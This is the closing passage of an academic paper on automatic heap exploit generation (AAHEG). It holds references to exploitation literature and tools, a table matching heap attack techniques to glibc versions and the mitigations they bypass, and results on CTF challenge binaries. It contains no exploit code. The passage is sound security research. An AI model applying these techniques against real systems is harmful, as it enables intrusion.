39. Mandt, T. Kernel Pool Exploitation on Windows 7. 2011. Available online: https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf (accessed on 1 December 2023).
40. Karimi, A. A Survey of Heap-Exploitation Techniques. 2021. Available online: https://www.researchgate.net/profile/Alireza-Karimi-31/publication/369594354_A_survey_of_heap-exploitation_techniques/links/6423d78392cfd54f84388e5b/A-survey-of-heap-exploitation-techniques.pdf (accessed on 1 December 2023).
41. david942j. One_Gadget. 2023. Available online: https://github.com/david942j/one_gadget/releases (accessed on 1 December 2023).
42. Phantasmagoria, P. The Malloc Maleficarum. Bugtraq Mailinglist 2005. Available online: https://dl.packetstormsecurity.net/papers/attack/MallocMaleficarum.txt (accessed on 1 December 2023).
43. Wang, F.; Shoshitaishvili, Y. Angr—The Next Generation of Binary Analysis. In Proceedings of the IEEE Cybersecurity Development, SecDev 2017, Cambridge, MA, USA, 24–26 September 2017; pp. 8–9.
44. Radareorg. Radare2. 2023. Available online: https://github.com/radareorg/radare2 (accessed on 1 December 2023).
45. Ctftime. Available online: https://ctftime.org/ (accessed on 1 December 2023).
46. Tu, H. Boosting Symbolic Execution for Heap-based Vulnerability Detection and Exploit Generation. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering: ICSE 2023 Companion Proceedings, Melbourne, Australia, 14–20 May 2023; pp. 218–220.
47. Liu, J.; An, H.; Li, J.; Liang, H. Detecting Exploit Primitives Automatically for Heap Vulnerabilities on Binary Programs. arXiv 2022, arXiv:2212.13990.
48. Heelan, S.; Melham, T.; Kroening, D. Gollum: Modular and Greybox Exploit Generation for Heap Overflows in Interpreters. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security, CCS 2019, London, UK, 11–15 November 2019; Cavallaro, L., Kinder, J., Wang, X., Katz, J., Eds.; ACM: New York, NY, USA, 2019; pp. 1689–1706.
49. Heelan, S.; Melham, T.; Kroening, D. Heap Layout Optimisation for Exploitation (Technical Report). Available online: https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf (accessed on 10 December 2023).
50. Eckert, M.; Bianchi, A.; Wang, R.; Shoshitaishvili, Y.; Kruegel, C.; Vigna, G. HeapHopper: Bringing Bounded Model Checking to Heap Implementation Security. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 99–116.
Exploit Method | Feature | Type | Applicable Version | Protection Mechanism Bypass |
---|---|---|---|---|
Safe-unlink | Arbitrary address writing | Linked-list attack | Any version | NX, Canary, ASLR |
fast bin attack | Control flow hijacking | Linked-list attack | Ubuntu version ≤ 20.04 (glibc version ≤ 2.31) | NX, PIE, Canary, ASLR |
Tcache poisoning | Arbitrary address writing/Control flow hijacking | Linked-list attack | Ubuntu version ≥ 18.04 (glibc version ≥ 2.27) | NX, PIE, Canary, ASLR |
Unsorted bin attack | Write a large value at arbitrary address | Linked-list attack | Ubuntu version ≤ 18.04 (glibc version ≤ 2.27) | NX, PIE, Canary, ASLR |
Function Name | Index | Size | Content | Main Functions |
---|---|---|---|---|
Add | Optional | Dynamic/Fixed | Dynamic | Allocate a heap block |
Edit | Dynamic | Optional | Dynamic | Modify the content of a heap block |
Show | Dynamic | No | No | Print the content of a heap block |
Free | Dynamic | No | No | Free a heap block |
Binary Name | Vuln Type | NX | Canary | PIE | RELRO (F = Full, P = Partial) | Advanced Exploit Technique | Exploit | Time (s) |
---|---|---|---|---|---|---|---|---|
2019_5thspace_final_pwn1 | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 32 |
2020_diaoyucheng_very_easy | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 50 |
2020_tiesan_fake | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 25 |
2020_wangding_magic | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 37 |
2023_longjian_14 | UAF | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 41 |
2023_longjian_8 | UAF | ✓ | ✓ | × | P | Safe-unlink | L + R | 47 |
2017_RCTF_RNote | Off by One | ✓ | × | × | P | Safe-unlink | L + R | 57 |
2018_0ctfquals_babyheap | Off by One | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 78 |
2019_roarctf_easy_pwn | Off by One | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 63 |
2023_longjian_16 | Off by Null | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 23 |
2018_LCTF_easy_heap | Off by Null | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 73 |
2018_qctf_babyheap | Off by Null | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 76 |
2018_rctf_babyheap | Off by Null | ✓ | ✓ | ✓ | F | Fast bin attack | L + R | 88 |
2019_5thspace_pwn12 | Off by Null | ✓ | ✓ | × | F | Safe-unlink | L + R | 42 |
2019_5thspace_pwn14 | Off by Null | ✓ | ✓ | × | P | Safe-unlink | L + R | 31 |
2019_swamp_dream_heaps | Off by Null | ✓ | ✓ | × | P | Safe-unlink | L + R | 54 |
2019_CISCN_pwn8 | Heap Overflow | ✓ | ✓ | × | P | Safe-unlink | L + R | 24 |
2019_qiangwang_AP | Heap Overflow | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 51 |
2020_diaoyucheng_unknown | Heap Overflow | ✓ | ✓ | ✓ | F | Tcache poisoning | L + R | 34 |
2021_longjing_hellocat | Heap Overflow | ✓ | ✓ | × | P | Safe-unlink | L + R | 49 |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Wang, Y.; Zhang, Y.; Li, Z. AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree. Symmetry 2023, 15, 2197. https://doi.org/10.3390/sym15122197